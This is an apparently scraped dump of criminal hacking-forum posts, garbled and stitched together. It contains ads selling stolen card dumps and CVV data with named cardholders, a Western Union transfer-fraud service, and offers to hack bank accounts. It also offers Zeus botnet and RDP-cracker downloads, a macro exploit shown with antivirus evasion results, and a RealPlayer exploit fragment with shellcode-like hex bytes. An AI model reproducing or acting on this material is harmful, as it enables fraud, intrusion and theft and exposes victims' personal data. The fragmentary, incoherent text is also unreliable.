tut thehackerboy flori offline junior member posts threads joined sep reputation location albania country albania money. 
for instance you're logging your facebook account make sure the url appears hidden content you must reply see links. 
where phisher page would look like hidden content you must reply see links. 
for example hidden content you must reply see links leads yahoo instead google. 
report the phisher's address here hidden content you must reply see links the phishing attempt has been done via message report the message any the following services hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links you received the message from friend's compromised account inform your friend and other friends that might danger. 
this nice still works will cool. 
thank you for that amazing tool really nice and recommended. 
it's old fuk why ppl think will work sent from iphone using tapatalk. 
habibi bro download link not working please help and send for private masg. 
seems very useful man thnx. 
great post thanks lot man. 
hello from indonesia and newbie. 
nice thanks you bro. 
thanks for sharing this with hope still available. 
nice little tool for pranking and stuff. 
radams wrote thanks for the great toolthanks thanks. 
this simple guide read somebody else facebook messages without any effort cheers mike joyjeus wrote let try. 
wrote table width how hello friends this trick still working dont beleieve look the below trick posted. 
hope thos method will work. 
this simple guide read somebody else facebook messages without any effort cheers mike thankss. 
lsvxjsq bwdkbqdk badjb vjdal jbajv axjb ask vazljb askv mvz kssj javnvvs. 
hello just checking your post. 
thanks bro gold share. 
codefire rocks found working and very thankful you. 
successfully hacked wifi neighbours. 
also mentioned this method blog hack wifi using android. 
nice tutorial going read now. 
nice have fastens your job. 
anybody also need the transfer. 
tracer for trace the money. 
usr bin perl title realplayer gpfile version. 
com impact high contact coolkaveh rocketmail. 
com twitter coolkaveh tested xpsp eng author coolkaveh bug ofthe dependent arbitrarycode. 
eax ebx ecx acedx bcesi edi eip dfesp ebp iopl nvupei plnznapenc efl error found. 
symbolsforc programfiles real realplayer codecs dmp. 
dll dmp getguid mov dwordptr esp eax exploitable eax ebx ecx acedx bcesi edi eip dfesp ebp iopl nvupei plnznapenc efl dmp getguid mov dwordptr esp eax hostmachine hostuser eventtype exception error found. 
dll status access violation exceptionsub type writeaccess violation exceptionhash major minor. 
stacktrace dmp getguid description writeav exploitable exploitable dmp getguid hash. 
xcc xba xcc xba. 
xbf xfe xdb xdb xbf xfe xdb. 
xdb xbf xfe xdb xce xcb. 
xae xfc xba xcd xfb. 
xbe xea xbf xdc. 
xed xcf xab xee xbe xdc xcb xcb. 
xab xff xae xcb xca xda. 
xcb xdb xeb xaf. 
xdb xfe xdb xce. 
xce xff xed xaf. 
xbf xdc xad xbb xac. 
xff xdc xde xdb. 
xfc xba xca xac xcf xce xfa. 
xea xec xaf xaf. 
xcf xac xbd xde xfe. 
xfc xab xcc xac xeb. 
xfd xda xbc xdc xcd. 
xee xee xbc xfb xfe. 
xde xbe xef xbd. 
xec xfc xdd xbb xff xfc xdd. 
xfc xdb xdc xed. 
xab xef xde xfc. 
xdb xad xdb xcc xab. 
xef xbc xed xdb. 
xef xdb xca xbf. 
xcd xae xfc xea xbc xbc. 
xdb xab xea xac xcd. 
xef xce xaf xde. 
xfc xdb xdf xdb xfc. 
xdf xdb xff xae xaf. 
xee xae xbd xef. 
xda xfe xac xef xba. 
xcb xfc xfa xfd xaf. 
xab xdb xaf xcb xce. 
xee xae xff xff xba. 
xef xcd xaf xeb. 
xbb xdf xcc xde. 
xde xad xfc xcc xca. 
xcc xbf xda xac xba xcf. 
xfa xce xdb xad. 
xab xbf xff xfb xcb. 
xed xff xee xcf xbb. 
xde xde xdb xbb xde. 
xff xef xff xba. 
xbd xbe xae xea xea xea xfb xed. 
xef xab xac xcb xed xbc. 
xcc xda xfb xae. 
xfe xef xad xca xdf. 
xbc xdf xef xeb xea. 
xce xea xab xff xca xfa xcd. 
xdf xbb xdd xed. 
xfd xcc xff xcc xbc. 
xad xfb xdd xab xad xff. 
xef xff xba xba. 
xfc xfa xcc xba xdf xaf. 
xac xdd xfc xdc. 
xab xbe xed xbe xef xde. 
xcc xfd xae xef xfb. 
xca xee xcb xbd xde. 
xff xff xba xdb xcd. 
xbc xdd xec xfa. 
xeb xdf xcd xbc xfb xfb. 
xef xcf xad xad xde. 
xee xef xdc xbf xfc. 
xff xfa xba xee xca xcb. 
xcb xcf xff xbf xff xfb. 
xca xff xee xcf. 
xbb xdc xbc xae. 
xad xbc xdf xaf xef. 
xbe xfe xdf xbd. 
xbb xde xcc xed. 
xcf xdb xcf xfa. 
xce xba xdf xde. 
xec xbf xab xfa. 
xce xbc xba xbe xda. 
xbb xda xae xab. 
omg hope works fine. 
hacking websites with html injection and xss cross site scripting complete beginner's guide video tut you like tutorial then subscribe channel. 
this good thanks man for this information waiting for next update. 
jpg download hidden content you must reply see this content. 
func remote desktop now the picture compression directly done gdi api's more fast stable and consume less memory fix remote desktop been optimized threading speed and stability fix resizing image algorythm been optimized func quality bar added desktop settings func remote control for desktop capture been improved fix webcam speed and memory usage better now multithreading been optimized aswell func now you can change the quality the picture webcam capture download. 
thanks for this brother. 
foksi wrote sql dorks all. 
php dorks asp dorks rfi dorks footholds files containing usernames vulnerable servers vulnerable files error messages files containing passwords. 
would love see this prank. 
hmm lets see this still active. 
allows attacker include remote file usuallpy through script the web server. 
uploaded our shell successfully the target site and think you all know that what all you can after uploading shell the site smile please show. 
php buy dumps atm sell dumps shop online china turkey dumps pin janpan usa track track buy dumps atm sell dumps shop online china turkey dumps pin janpan usa track track guarantee work dump price track track pin track track pin track track pin track track pin track track pin track track pin china track track pin china dumps tracks pin usa dumps tracks pin brazil dumps tracks pin canada dumps tracks pin france dumps tracks pin germany dumps tracks pin italy dumps tracks pin norway dumps tracks pin turkey dumps tracks pin and more. 
here sample test dumps credit platinum credit one bank. 
united states hollywood credit platinum credit one bank. 
united states hollywood stine katherine credit platinum united states tampa callahan katherine credit platinum united states tampa patel roshni credit platinum united states tampa whelchel justin credit platinum united states tampa track mamiko kobayashi track atm pin state tokyo country japan track fatih gucer track atm pin state capa fatih country turkey track laleh babanazari track atm pin state guilan country india track bibliotheque track atm pin state quebec country canada track shue chen huang track atm pin state. 
counrty taiwan msr prices msr msr msr msr msr msr msr msr msr msr msr msr msr mini msr msr crm msr xcrm and more orther countries guarantee dumps pin for sale dumps valid rate refund hours dumps dead invalid you want buy dumps bulk please contact support for get the discount credit card usa asian inter. 
and many countries other type visa master amex discover full cvv random format card number exp. 
date cvv first name last name address city zipcode state country phone number ssn dob mother maiden name social security number accept payment via bitcoin perfect money webmoney western union have only this icq jabber other icq have only this gmail martin. 
com thanks look forward working with all you. 
com icq upgrade university grades facebook instagram twitter whatsapp line skype hack delete unwanted online pictures and videos any website remove criminal records hack bank accounts apps hacking mastercard paypal bitcoin money gram with untraceable credit etc. 
thanks for the script. 
bond benz wrote rdp cracker included with user and password list download pls where can download the link thanks. 
let see work out. 
thanks lot was usefull. 
reply for read the hidden. 
want try this hope this work. 
codefire wrote contact feel free result squared emisoft antimalware clean nothing found agnitum clean nothing found ahnlab internet security clean nothing found arcavir clean nothing found avast clean nothing found avg clean nothing found avira clean nothing found aware clean nothing found baidu clean nothing found bitdefender clean nothing found bkav clean nothing found bullguard internet security clean nothing found bytehero clean nothing found clamav clean nothing found comodo clean nothing found total defense clean nothing found. 
web clean nothing found escan clean nothing found etrust vet clean nothing found escan internet security suite clean nothing found eset nod clean nothing found fortinet clean nothing found fprot clean nothing found fsb antivirus clean nothing found secure clean nothing found gdata clean nothing found ikarus clean nothing found immunet antivirus clean nothing found iobit malware fighter clean nothing found ultimate clean nothing found kaspersky internet security clean nothing found kingsoft clean nothing found mcafee clean nothing found microsoft security essentials clean nothing found nprotect clean nothing found nano antivirus clean nothing found netgate clean nothing found norton internet security clean nothing found norman clean nothing found outpost security suite pro clean nothing found ozone clean nothing found panda antivirus clean nothing found panda cloud clean nothing found tools clean nothing found quick heal clean nothing found clean nothing found solo clean nothing found totaldefense clean nothing found trendmicro internet security clean nothing found trustport antivirus clean nothing found twister antivirus clean nothing found unthreat antivirus clean nothing found vba clean nothing found vexira clean nothing found vipre internet security clean nothing found virit clean nothing found webroot clean nothing found zillya clean nothing found zoner clean nothing found clean nothing found filename macro office exploit. 
doc file hash file sha file size bytes time scanned scan provided link scan url buyed that expl later. 
shit way too expensive. 
other sellers sells for. 
sqlninja microsoft sql server web sql perl mysql safe sql php asp rfi dorks. 
nice program man keep. 
accepting paypal for limited time only video also accepting skrill payza psc euw codes send will give vouch copy too trusted member terms service. 
you may not use this program any accounts you not own have full consent from the owner. 
you will only use this program for educational legal penetration testing uses and restore lost passwords. 
the owner and seller this program not responsible for any your actions when using this program. 
not offer refunds you have problem contact and will solve your problem. 
you will not attempt decompile reverse engineer this program. 
you will not attempt leak this program. 
you accept full responsibility for your actions when using this program. 
you understand that using this program accounts you not own will most probably end legal action being taken against you. 
and least windows vista bit. 
not bad seems easy. 
logesh wrote lemme try this awesome. 
tell some info may will help. 
hsjfdkbfjhfsjf hdjdjjd skhfkshd jckx. 
sorry but can you tell how your instagram account was hacked. 
hello this link not working not working not working. 
doe wrote hider pro. 
caca maca kaca baca catas. 
i'm glad you commented use. 
manager wrote hello guys there hack write email adress and the password displayed. 
want see what xploit got. 
wow surely wanna checkt his one. 
definitely have try this. 
tut thehackerboy thanmks mate. 
tut thehackerboy lemme try. 
php hello ladies and gentlemen have nice day shop dumps online buy dump track dumps china pin china dumps shop buy dumps shop qualiaty dumps good shop dumps china visa mastercard amex discover fully automated card shop for the sale cvv dumps. 
new dumps bases valid. 
country worldwide mix china asian etc. 
cvv fullz info available right now. 
update mexico fulls for sale store. 
write responses and questions only english let's make business good with our team. 
cant wait tests this out. 
thanks dude very nice post. 
thanks for the tool. 
was looking for from long time. 
prnice work atham wrote happy new year. 
how hack plz send full details. 
need the exploit word office excel macro exploit exe. 
thank you for uploading. 
privateloader wrote the last few years hackforums. 
thank you sent from using tapatalk. 
transfer service has now been fully verified and tested the admin and proud offer very effective global western union transfer service. 
procedure receive western union transfer you need provide the following information. 
first name last name city country required for collection you can choose create name that matches your profile and ethnic background. 
attach security questions answers payments avoid the need for and therefore eliminate scans. 
this alternative procedure guarantees complete anonymity. 
payments are sent via money minutes service. 
this service instant soon payment confirmed our western union terminal the mtcn code and sender info generated and forwarded you instantly. 
upon successful completion provide the following information. 
sender first name sender last name sender city sender country secret question secret answer mtcn code you collect your transfer with the provided information and notify when you have successfully collected payment. 
then completely delete the transaction from the western union network therefore ensuring overall anonymity. 
prices note transactions worth over require tax declaration which will overwork western union terminal networks. 
therefore not request single transactions worth over. 
you want transfers for over you need purchase separate transactions and combine the receivable amounts. 
for example you want transfer you can purchase transfer and transfer. 
faq's how quick are transactions completed answer total completion time minutes maximum. 
from payment receiving mtcn collection codes. 
all western union transfers are sent via the western union money minutes service. 
how guarantee complete anonymity answer firstly you are advised use fake names when collecting payment not required with our western union transfers. 
instead all our transfers have security question attached. 
and you are provided with the answer. 
not required the security question answer feature used. 
this security feature used default all our western union transfers. 
secondly and more importantly our total control agent terminals administration level control gives complete access the western union network. 
therefore have the ability delete our transactions from the overall transaction list the western union network. 
how actually western union transfers what our method answer use kvm devices various western union agents. 
once place our kvm terminal technically have full agent control. 
meaning can transfer and also delete transactions the western union network. 
only target large western union agents and always change locations. 
never use cc's fulls software transfers. 
how successful are western union transfers answer western union transfers have success rate. 
our service gold rated the mayor admin and the moderators this forum. 
what are the rules answer rules are straight forward. 
not waste time and collect transfers within hours receiving the mtcn. 
also remember leave good feedback our page when have completed your transfer for you. 
why don't send unlimited western union transfers ourself answer have cashiers are currently using for per centage based work and encourage repeat customers through the verification process and join worldwide team cashiers. 
however the amount available transfers cannot handled current team cashiers europe and the. 
its simply too much send. 
this surplus transfers are instead sold here. 
rather sell transfers for secure value then allow our controlled western union terminals unused not used their full potential. 
how you pay answer are now accepting all modes payment for this service. 
how quickly can you get started answer simply contact the mayor and select service. 
you all know all first transactions are done via the mayor's escrow insure are all safe. 
once complete couple transfers for you then will have direct contact. 
contact icq yahoo themayor yahoo. 
will introduce useful free services. 
service that can easily upload and download files. 
can downloaded any time for two weeks. 
per file can uploaded. 
all photos pictures videos etc. 
free file sharing sites without ads banners. 
user reviews and advice are very helpful. 
anytime anywhere anyone easy share. 
bro can see how works. 
thank you thank you thank youthank you. 
this looks really good. 
contact for price you need buy cvv credit card please contact now for more information icq icq sell cvv good balance and hacker big cvv good icq sell cvv all country all country good and fresh sell cvv good balance and hacker big cvv good i'm hacker good cvv and seller cvv good now have more for sale sell cvv acc paypal dumps track bank login transfer online rdp smtp mailler. 
contact for price you need buy cvv credit card please contact now for more information icq yahoo peter. 
i'm going try this i've got the. 
thanks for this tool. 
hope tyhis works dude. 
really need walmart checker can you help with walmart checker. 
marnn swear couldnt find broo. 
sounds great let see. 
codefire wrote apple icloud. 
txt ibrute icloud icloud xampp server icloud. 
rdp vps services selling rdp ser sing month month selling vps ser sing month month promise stuff very good and fresh all with good price ccv not good will change within hours accept payment bitcoin perfect money western union only with ccv min sell thanks for read hope you are better customer and can work long time. 
only serious customers icq support email maclini yahoo. 
fcvazuf denial service attack dos attack cyber attack where the perpetrator seeks make machine network resource unavailable its intended users temporarily indefinitely disrupting services host connected the internet. 
denial service typically accomplished flooding the targeted machine resource with superfluous requests attempt overload systems and prevent some all legitimate requests from being fulfilled. 
dos attack analogous group people crowding the entry door gate shop business and not letting legitimate parties enter into the shop business disrupting normal operations. 
thanks for share broefirethanks for share bro wrote indent sqli binger works with bing and automatically finds sqli vuln sites same server. 
thanky you for your thread. 
thank you for this software. 
will definitely have check this out. 
interesting bit information are always cherished the part enlightenment. 
thank you for the post appreciate. 
jkbdjkasnfsa oif nsa fnfisf fipsdgbj. 
wrote ent amigo este novo aplicativo crack rdp vnc telnet ssh ftp smb pop pop vou postar link download tutorial para uso taxa. 
seu post vou enviar link download tutorial para esse aplicativo. 
vouch for the mayor thank you for the feedback anyone also need service. 
interesting will definitely look into this. 
the latest release web proxies called web proxies central check the link below download hidden content you must reply see links virustotal hidden content you must reply see links main thread hidden content you must reply see links. 
got see this ope sese let read. 
will try seems interesting. 
let try this wow amazing. 
bond benzyou are wrote free working php script check valid emails and registred with paypal. 
screenshoot download youre hero its real its not real will make lifes mission find you. 
hope still works lets see. 
you can crack kohl's accounts and steal users kohl's cashed which can stacked from multiple accounts get electronics clothing etc. 
have workers for the kohl's cash and will buy any kohl's cash found these accounts. 
simoxddss wrote codefire wrote cpanel nightmare priv times faster from puplic version its shows becoz its code. 
can try this program. 
wrote nas buhar hesaplar atlamak zel iyi bir posta lan listesini. 
load bir proxy listesi kullanmakta oldu unuz yak zel. 
nas program postalar denetler giri yapt ktan sonra giri yapmaya. 
oturum ktan sonra kullan adlar ifreleri eren kler gibi buharla ilgili postalar denetler. 
thank's for your great contribution. 
credit card and scammers. 
gracias will love this. 
cant wait see this thx for sharing. 
hidden content you must reply see links there ahead and make account there. 
let's hope this works but thanks anyway. 
want see this one. 
thanks for sharingy yhjk. 
realy helfupl thank you very much. 
link dead file delted. 
thanls for the share. 
such big list thanks for sharing bro. 
thanks for share bro but work. 
this working thank you btw. 
bdaxljsvadkb qsk bqsk bdakb dal badkb ksb. 
codefire wrote denial service attack dos attack distributed denial service attack ddos attack attempt make computer network resource unavailable its intended users. 
learn about its symptoms and manifestations methods attack and many more. 
indent there are several ddos attack tools the internet although the simplest way use thanks for reading tutorial. 
manxem wrote cybdom wrote this modified version the famous botnet zeus. 
you can download from here for free hello need sorry for making you wait this the link. 
ktufox this modified version the famous botnet zeus. 
contact feel free result squared emisoft antimalware clean nothing found agnitum clean nothing found ahnlab internet security clean nothing found arcavir clean nothing found avast clean nothing found avg clean nothing found avira clean nothing found aware clean nothing found baidu clean nothing found bitdefender clean nothing found bkav clean nothing found bullguard internet security clean nothing found bytehero clean nothing found clamav clean nothing found comodo clean nothing found total defense clean nothing found. 
doc file hash file sha file size bytes time scanned scan provided hidden content you must reply see links link scan hidden content you must reply see links. 
this simple guide read somebody else facebook messages without any effort cheers mike hey thank you can see the link. 
this will very lovely knowledge acquire thank. 
you can always try for free web proxies central. 
